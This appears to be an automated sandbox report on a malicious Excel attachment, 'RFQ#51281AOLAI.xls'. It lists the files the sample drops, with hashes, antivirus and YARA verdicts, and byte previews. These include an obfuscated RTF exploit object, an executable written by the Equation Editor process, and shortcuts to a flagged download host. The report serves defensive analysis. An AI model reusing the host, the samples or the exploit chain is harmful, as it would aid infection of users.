                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Rich Text Format data, version 1
                Category:dropped
                Size (bytes):84055
                Entropy (8bit):2.564253730925419
                Encrypted:false
                SSDEEP:384:kwiGEC30k0fWHuaN6oQeO3seC31xcxwV+k629/sYdhpfsl4ZnxP941:N1WWPNxssN31xcxc+kRsYdkl4Znr0
                MD5:0A9C028203A8416BE8DB7371550D0FB5
                SHA1:2F576CDFBF4F60918676F6583265C504BDEEFA21
                SHA-256:A424C4312F97747EFA22A627AA0C77C4F11022D171E11D3EEFF00DD77B737520
                SHA-512:51D92688ABEE365F550552C565EBC422000C6CDF6A0E58528922BDE4323906CD85D3DCF7D29FB52ADF9CDC4C59E3310704A25657B5A9683ED041087F7DB01B69
                Malicious:true
                Yara Hits:
                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1804222C.doc, Author: ditekSHen
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Reputation:low
                Preview:{\rtf1.............{\*\groupTop920443172 \(}.{\664116854/<`?2:.~57$-|-+],|2/?5$,;^?+!.8/.~]%...6^3/;8.4#[..?>):5@2=?0??97(+.6.#+`'5:);*(5??@7.;6?&4%:25[756?1?^].&[&&&+*>7-%1?8?%6$*!;|#?_20=/!~+'%?:?%[4']?/,|?`8(?_#/)1|>9%-```6.64;073*%%,$?3%</''@/_9'.?.4`_,#1$`>5#*?6<~<'?=;&%0&#?/.?*$?.&..7]#?.?~?%,?#8/'&):?.4$?77*4*^70?6?-..)^_`?9=:%`..|$+?]'0~]._1,;!.7.~??29`;:?<?_[^?5*@_0_6*,?>;.-?>10@|@*=*?!>,]`2,':**[3#7]?8>2$~@.1?,-%?7'.<&@+)|-'*!4!2&?72&=5]#/?`_|&,-)$@9_2$,&+)7`2>/.%<?#+&_`:3^/'1=2%-'7`%5%..99?6+%`+0.?>1$%8_%?%0[)()!.<%*?%&~-#.9??:&!-5~2#10]|?7('?~^[6.-'`$)=`%?97(9<5;-6?@~?.0[.00`%3+#4`8...48,>-?_.@.%>7[!~7?)86,)@*&/?7`!..-$%;21.>2&<-.%[5-/|&+:7@2!4+~`.[?=@'=+.(?,1/&!|.>1.&,5.'&|4:*3.|7.~+,,=*~@.[.36%/!.&(#&`..?8-1?*(_)_,8#]'=..!?_%?%?,9.4***?4[-5$$?6==,=''1~%*~.,25~;.=7`[<*].87/.?.;89[>.).|;?8^??5:^:0^*]07?9??*/+?<@6727:?_!>+?`-8%?'':)8`>-.-#7(/3)]??%@6%68<~)16!|:%|^?>4=4:[..;_?@'^>`#..1$?%/3^;.=`^.$><?^..]:+./7/7.<26$5=??*~19-|6|$?5/!(58,`?.6:)1_5)[|?/'-0::8?.9'52(:%~22+4))&3*

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A58DCE7.emf

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):47668
                Entropy (8bit):3.1585879051692287
                Encrypted:false
                SSDEEP:384:DU3D+b3D5w5Md8+8HigjlyI2bvIM6kbvBnMVGGSvUAEgGNTpy:DU36KMiBHiQIb5r6VGdMAL5
                MD5:35B30015386CA1A3BD10175FE75A2057
                SHA1:DE57E72A356A981D36F2E1206A4353B2156F92CA
                SHA-256:A377C5AB1583B3C174F51C5349A9520BD93356220073B4E138D3981FB75F3BFE
                SHA-512:BD273D1F44DA4FFEFD6C1F11A5C109B0B0727255F110FCB8E2143570407F49AF0BB12EFA7DACA560BC37928AA6A1822909DB5718AD5F36C2C43C6D2712ABEA0A
                Malicious:false
                Reputation:low
                Preview:....l...........;...............~@..xW.. EMF....4...u.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%.......................R...p................................@..T.i.m.e.s. .N.e.w. .R.o.m.a.n.......................................................................7.O*;........... ............... ............... ....................... .......G................*..Ax...N..............T.i.m.e.s. .N.e.w. .R.o...F.....6...................................................................dv......%...........%...........%.......................T...T...........+...q........i.@...@....Z.......L...............<.......P... ...,...............T...T...,.......W...q........i.@...@,...Z.......L...............<.......P... ...,...............T...T...X...........q........i.@...@X...Z.......L...............<...

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\618F8639.emf

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):3345824
                Entropy (8bit):4.127125964869289
                Encrypted:false
                SSDEEP:12288:31SyEH5O3VGnjujIwQusOwvBWXKcnXfxpjZarUkeaNYHAo1KWwy1wAD8dt3iGnjs:3Iy6O3owCKCG15wy+Aat3wwKuWh1Owz
                MD5:58E652C4B5EC5C5E39FD35E4173028E2
                SHA1:527EAA579DABD37C966DE4E6774CFE6525C5639D
                SHA-256:1A1BA95C0916EE7B8F6E82DC43A615CBF888B7A01BD74626E7F5B38AF3C50FCA
                SHA-512:A1CF5189F885B5F50EC164C2A8F511379B49AD8229C042D7515745407CD72E69480895E3208E897B8EF56D732EED067A68197BAA953F12288F6CF08DC36A1FF3
                Malicious:false
                Reputation:low
                Preview:....l...........Q...............!?..3X.. EMF......3.....5...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'................3f.....%....................3f.....................................L...d...4...f...7...{...4...f...........!..............?...........?................................'.......................%...........(.......................L...d...............................$...!..............?...........?................................'...

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\778D7DAF.emf

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):3193556
                Entropy (8bit):4.049018355083669
                Encrypted:false
                SSDEEP:12288:711gPI5R32GnjPjIwcusrwvsWXKcnXfxpMZacUkRaN7Hjo1PWwVD8dt3iGnjPjIJ:7jgOR30wOSKx1OwVat3wwKuWh1Owb
                MD5:762C6A27FE6DF812EE45907EB47438A3
                SHA1:8C19872A02FAA2CFFC53414535B9FA33E639DE58
                SHA-256:584EB121F00BB118B6E6E3E9E76CF9E6905701957A0FA671B1B90E97ADE5AEA9
                SHA-512:36D581E65A3DBD470DFD868D09809AC175453B6F759663E90D61D38D38D45FDE3CC1572BDCE31E51D23A45438A0D4529295B5C6BCFD6416D971A0A5E662E4DA7
                Malicious:false
                Reputation:low
                Preview:....l...........Q...r...........QN...a.. EMF.....0.f...'...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C11641BC.emf

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):3360728
                Entropy (8bit):4.12715122011149
                Encrypted:false
                SSDEEP:12288:p1/uhO5r34GnjpjIwIustwvuWXKcnXfxpCZa+Uk3aNxHJo1dWwS1o3D8dt3iGnja:p9u2r3gwaamn1cwSC3at3wwKuWh1OwN
                MD5:A1C51E11D5B84EEF4769C501558C7DDA
                SHA1:9E3651E07BD6DAFD0BC6A44904B6ADEF7AA6494A
                SHA-256:F2B07F8CC9DF48882DFF98F5B00AA45B192D5A371FB518FF6E7BB29F97EC2649
                SHA-512:F899EB5CFBB4E09A3A4A0348BDB61D4EDD80B78405945FB43EB2B7E7B2B7452FF60FAFF1079D7DA040CDA5FF22DF95133C347CE810D1254A1C21E0A7A32D2BAC
                Malicious:false
                Reputation:low
                Preview:....l...........{................D...`.. EMF.....G3.....5.......................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................#..."...........!...................................................#..."...........!...................................................#..."...........!...................................................#...'................3f.....%....................3f.....................................L...d.......R.......c.......R...........!..............?...........?................................'.......................%...........(.......................L...d...................................!..............?...........?................................'...

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D8610C7A-67F1-4B3D-A1E4-B9ACF1973A7E}.tmp

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):15872
                Entropy (8bit):5.731678793979241
                Encrypted:false
                SSDEEP:384:gPp3BLlaiNLaJP43BLUdiNLaCPn3BLUaiNLaCPg3BLUaiNLaCP43lLUaiNLa:MLn2+L72YLO2dLO2JLO2
                MD5:62460492D588390D5EFD41941070043F
                SHA1:5FE8C9FFD8FBAA34F37230E5F24A631B5D2510D7
                SHA-256:0770F2B7A606A11EE90B7108CDB7FD0EA7929401BE5C76E7C1F84D7DC58F1274
                SHA-512:B7078D9668EC7BC8BD596486CE0C8EBDDA46B60422738CEFEB4FD33092CDEF74487AB161822D356CA6EEB9944B2EDE60CD6C319F0C40C6AA442CDB0D8CE8EAD3
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Reputation:low
                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08E78181-6D20-42CF-B069-F8953A2490BB}.tmp

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):8704
                Entropy (8bit):3.55451473025169
                Encrypted:false
                SSDEEP:192:QivRy8FTydoCB1GiavHhLKcgeUXWZpBIJzeDkkWSP4HZnq7z:D4cSd1DyHhrgL2PIJzakkF4HJIz
                MD5:0BF66D3EBC5972457B2C9982AD30E78D
                SHA1:8358C706AA564A2F60BE028C0C6462C3AB17FFD8
                SHA-256:574D29C325594A48C1C052DD1F8EFF72604E471A9873AC95BA571DD5D126C026
                SHA-512:51F1C4B97789A674E2F2C8AF19C624E72A9225D64FD3F2D6AE63F832A76D1825E30D0BE08B21EFA427A5A731305342C2A0BF2386013A211F1B2652F01E726A14
                Malicious:false
                Preview:..................6.4.1.1.6.8.5.4./.<.`.?.2.:...~.5.7.$.-.|.-.+.].,.|.2./.?.5.$.,.;.^.?.+.!...8./...~.].%.......6.^.3./.;.8...4.#.[.....?.>.).:.5.@.2.=.?.0.?.?.9.7.(.+...6...#.+.`.'.5.:.).;.*.(.5.?.?.@.7...;.6.?.&.4.%.:.2.5.[.7.5.6.?.1.?.^.]...&.[.&.&.&.+.*.>.7.-.%.1.?.8.?.%.6.$.*.!.;.|.#.?._.2.0.=./.!.~.+.'.%.?.:.?.%.[.4.'.].?./.,.|.?.`.8.(.?._.#./.).1.|.>.9.%.-.`.`.`.6...6.4.;.0.7.3.*.%.%.,.$.?.3.%.<./.'.'.@./._.9.'...?...4.`._.,.#.1.$.`.>.5.#.*.?.6.<.~.<.'.?.=.;.&.%.0.&.#.?./...?.*.$.?...&.....7.].#.?...?.~.?.%.,.?.#.8./.'.&.).:.?...4.$.?.7.7.*.4.*.^.7.0.?.6.?.-.....).^._.`.?.9.=.:.%.`.....|.$.+.?.].'.0.~.]..._.1.,.;.!...7...~.?.?.2.9.`.;.:.?.<.?._.[.^.?.5.*.@._.0._.6.*.,.?.>.;...-.?.>.1.0.@.|.@.*.=.*.?.!.>.,.].`.2.,.'.:.*.*.[.3.#.7.].?.8.>.2.$.~.@...1.?.,.-.%.?.7.'...<.&.@.+.).|.-.'.*.!.4.!.2.&.?.7.2.&.=.5.].#./.?.`._.|.&.,.-.).$.@.9._.2.$.,.&.+.).7.`.2.>./...%.<.?.#.+.&._.`.:.3.^./.'.1.=.2.%.-.'.7.`.%.5.%.....9.9.?.6.+.%.`.+.0...?.>.1.$.%.8._.%.?.%.0.[.).(.).!...<.%.*.?.%.&.~.-.#.

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5CE800B2-9CAD-48B0-82E6-4D27080748BE}.tmp

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\{704DAF71-65D1-48F4-B9C9-DC333238605D}

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.025609999625234036
                Encrypted:false
                SSDEEP:6:I3DPcsdzavxggLR5qN4ggtfJC3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPtd4A/vYg3J/
                MD5:73F40E7DA641C385E1AA45A33C2778A0
                SHA1:1818A6A6DF4CE34A7B57C5405FEBAE5922543DEF
                SHA-256:7B856D63BC0E9DD5C4EBE33E92AA290D4223F9E35F84A0B06C6BC9D788D36E66
                SHA-512:03DBC069DC2AB8EB09B3313F1656B765B8D1F3CBCE1A6610E844A46C047665F6DC92A0BDDC6010D42516E5C995540C5FFFE45A74C1A84BC12E2EBE4CB1644320
                Malicious:false
                Preview:......M.eFy...z..w...MK........S,...X.F...Fa.q............................n.:.38.D..`T............4.{~.w@.....re.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\{831D91D1-2FDE-4168-AA5B-39052A58B71C}

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.025596957129929574
                Encrypted:false
                SSDEEP:6:I3DPcm40EHvxggLRhnITlKRXv//4tfnRujlw//+GtluJ/eRuj:I3DPPGP9nIAvYg3J/
                MD5:785E95E6D61CFD99D8E88D0B730BF627
                SHA1:EF80DA06B055502E37CC0E2255B401F0D49D95BB
                SHA-256:94208FB5BDE2E69A7910DB7214DD42B3A5ADB6D6147E85322C54D05B0E141AA1
                SHA-512:D5B52400D306B845FE3269697ED1DDE253FBE68A7C7CC0C9030834AD0219BDE24E46D9C7931C1D8AC404ACF24A9ADBEBA1DCF441FB7283AE8E387405E9276E57
                Malicious:false
                Preview:......M.eFy...z)k5...L.....g?QS,...X.F...Fa.q..............................,..#K.].............(J.Mc.L.@..;6.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\~DFA325E3051B1D4983.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\~DFB487D2232F45372D.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):568320
                Entropy (8bit):7.929286061398217
                Encrypted:false
                SSDEEP:12288:1lQfeWxJ3P++kns9xbEHQs57JDxmIHjvW4pM:8ZwsLEh7JvrW42
                MD5:663FD2DD2F0DCCFA6CDD033774F9DE29
                SHA1:11ADB3725CD135D9808BBA33F1E5C91DC2A4D3D5
                SHA-256:CD6376AE9CF24A6C56412C3ACBE4EE442EEAC9273BB6D7AE5F326229AF0136AA
                SHA-512:18FF8BF1C23CF3C45204A05463C722C7F6CC5692212F2A44FE59C17B2AFDF5965CC438C6E5A18E2AC4FB1756EFCFD7E389A1E5D906966D73EAD9977094D65E3A
                Malicious:false
                Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                C:\Users\user\AppData\Local\Temp\~DFC58CCA3479128B9E.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\~DFFE8567877254EA13.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):577536
                Entropy (8bit):7.85985508602154
                Encrypted:false
                SSDEEP:12288:wlQfeWxJ3P++kns9xbEHQs57JDxmIHjvW4pMB:1ZwsLEh7JvrW42B
                MD5:75FC44053BCA6FD3FAF8AD4971498697
                SHA1:45E7D3FAD9D1E015416AB502C8E2BDE43773B6BC
                SHA-256:8909F4E350605C90DA67BA6B9A806677B3B9C43E82FBE174ED55F68E378FC9B4
                SHA-512:BE9E1CC891AF67E701C70C7B1AB4B476B6CB370EB632A1CC93BA0B5433E354F92EE126B923653AFD8F0BC28CBCA2708A04EBA5A75A61A54543965EF9F21C50E7
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\dGa.url

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/dGa>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):44
                Entropy (8bit):4.470573095811685
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/3LcmWdovn:HRYFVm/3LOdyn
                MD5:0FFF39E1FDCD78B0E6A988670CBFAB2C
                SHA1:9206238017EA564C8332D48A4AEA14F555ACA73E
                SHA-256:6EAEA2BF73B0E93543F442CA1AC65D1621D96E770DCC89C22089CCFCBD6E02D8
                SHA-512:A3C6116FA93D2F340500180FFE065254F9CCFB5A87E24715C37F301451C7749C550C52FE9FBEFC29EFCEA722B7EE3920D3578A4D3705CC6C5AB57D24BB998C91
                Malicious:true
                Preview:[InternetShortcut]..URL=http://tny.wtf/dGa..

                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Generic INItialization configuration [xls]
                Category:modified
                Size (bytes):88
                Entropy (8bit):4.9664307324412285
                Encrypted:false
                SSDEEP:3:bDc7SIcLOQBGK5mM7/BGK5v:bQOhDBGazBGS
                MD5:963168A7D6EE229C565540108AD3D53A
                SHA1:689D839FE5A0A91D76721FAD78A1A2AD329F14C7
                SHA-256:6434A3C4C2BB4ED907E267695CE40752FF7C0BA161D698735AD9418426C429AA
                SHA-512:5A11866EAB7F507EDABD9EB53874805058F5E5462F195B05D914D042A04CEE1B12BDDE0A6278FBE04E4F0BF6D0319805DD13710ACC4AFCF2ACCAF5D01CFA14D6
                Malicious:false
                Preview:[folders]..dGa.url=0..tny.wtf.url=0..RFQ#51281AOLAI.LNK=0..[xls]..RFQ#51281AOLAI.LNK=0..

                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tny.wtf.url

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):41
                Entropy (8bit):4.2963379801223045
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/3LcmWy:HRYFVm/3LOy
                MD5:D591A53347F94FBC48B4B6A5CCE920ED
                SHA1:C00082566F3211F9B1BBEC933A8AE164759C290A
                SHA-256:1CA93696A94797C9411318830CAC6A5B26FEACC37D5CAA4B3742D722CD073781
                SHA-512:BA14258049ABCC3E31AA3DFC3ABBC2949AF30BB73B031C0E408BCF036B51B7AC11E32C3B39A7952E1A007179720C970B29CB2DF8EF03A021EF3B59FEB5AE177E
                Malicious:true
                Preview:[InternetShortcut]..URL=http://tny.wtf/..

                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.503835550707525
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                MD5:CB3D0F9D3F7204AF5670A294AB575B37
                SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                Malicious:false
                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                C:\Users\user\AppData\Roaming\winiti.exe

                Download File
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):951296
                Entropy (8bit):7.752827643333699
                Encrypted:false
                SSDEEP:24576:yXRv6h6aYfy8hbsv4IFlwLa15cAJAiV8KObLDCmCeBaOmXi:4JpTw8kJH8hCmvAOGi
                MD5:1F5C95D40C06C01300F0A6592945A72D
                SHA1:79A217ED19833EFCF640FFD8BB04803E9F30D6F4
                SHA-256:434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
                SHA-512:3CD70090E071E43B22A3638D8CDF13874C5DA34AFF2CB314E170FEDA59D630594314F45708797D83A47ED645A7F07755AC10F4A438858E6673CE560FE5F57975
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Virustotal, Detection: 48%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.f..............0..x............... ........@.. ....................................@....................................O...................................(m..T............................................ ............... ..H............text...$v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...........LU......I...PZ.................................................}.....r...p}......}.....(.......(.....*...}.....r...p}......}.....(.......(.......}....*..0..............r...ps......o.....r...p...s.....s......s.........o....&..o.....o....}.....{.....{....o.............o....( ...&.......o!......*.........._b.. .......tw.......0............{....r...po".....{....r...po".....{....r...po".....{.....{.....%.o#.....o#.....{....r...po".....{....r...po".....{....r...po".....

                C:\Users\user\Desktop\1E630000

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 10:07:42 2024, Security: 1
                Category:dropped
                Size (bytes):1140736
                Entropy (8bit):7.982560383197047
                Encrypted:false
                SSDEEP:24576:KZwsLEh7JvrW42JTEShdazqOSLpNNM+PjgW/QX79:KysK7VW42RrAWLpNNM+snXx
                MD5:77EA59019C8F5EF8E52F6E0F370D9F1D
                SHA1:8C175BD2A303AFD53C4E928A7326064363E79341
                SHA-256:9DA4E575D2B874AC4FE36DA1361947F97EBBBEF0E1A071894C7B759F8507F00B
                SHA-512:5E050CA4BB96F93CA2EFBB3F129303E462C9EC7B9EAABB8FC126553B73445FEBA388ECF3F8B6BF59691BD4B3EAB85F97CE127BD6541CE8ABC02BF3C01458224A
                Malicious:false
                Preview:......................>...................................D...................................................f.......h.......j.......l.......n........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                C:\Users\user\Desktop\1E630000:Zone.Identifier

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:false
                Preview:[ZoneTransfer]....ZoneId=0

                C:\Users\user\Desktop\RFQ#51281AOLAI.xls (copy)

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 10:07:42 2024, Security: 1
                Category:dropped
                Size (bytes):1140736
                Entropy (8bit):7.982560383197047
                Encrypted:false
                SSDEEP:24576:KZwsLEh7JvrW42JTEShdazqOSLpNNM+PjgW/QX79:KysK7VW42RrAWLpNNM+snXx
                MD5:77EA59019C8F5EF8E52F6E0F370D9F1D
                SHA1:8C175BD2A303AFD53C4E928A7326064363E79341
                SHA-256:9DA4E575D2B874AC4FE36DA1361947F97EBBBEF0E1A071894C7B759F8507F00B
                SHA-512:5E050CA4BB96F93CA2EFBB3F129303E462C9EC7B9EAABB8FC126553B73445FEBA388ECF3F8B6BF59691BD4B3EAB85F97CE127BD6541CE8ABC02BF3C01458224A
                Malicious:true
                Preview:......................>...................................D...................................................f.......h.......j.......l.......n........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 02:51:49 2024, Security: 1
                Entropy (8bit):7.938231053601514
                TrID:
                • Microsoft Excel sheet (30009/1) 47.99%
                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                File name:RFQ#51281AOLAI.xls
                File size:1'155'072 bytes
                MD5:6a2cb319332d2a0e586a3d1486af5c5a
                SHA1:1940ec2ffeb4676a56ac584567c419c31857bd61
                SHA256:3f341c20d06b4099461e0da9ced7d2e3d599e447d0acdf10b9a7d4a9e30d4440
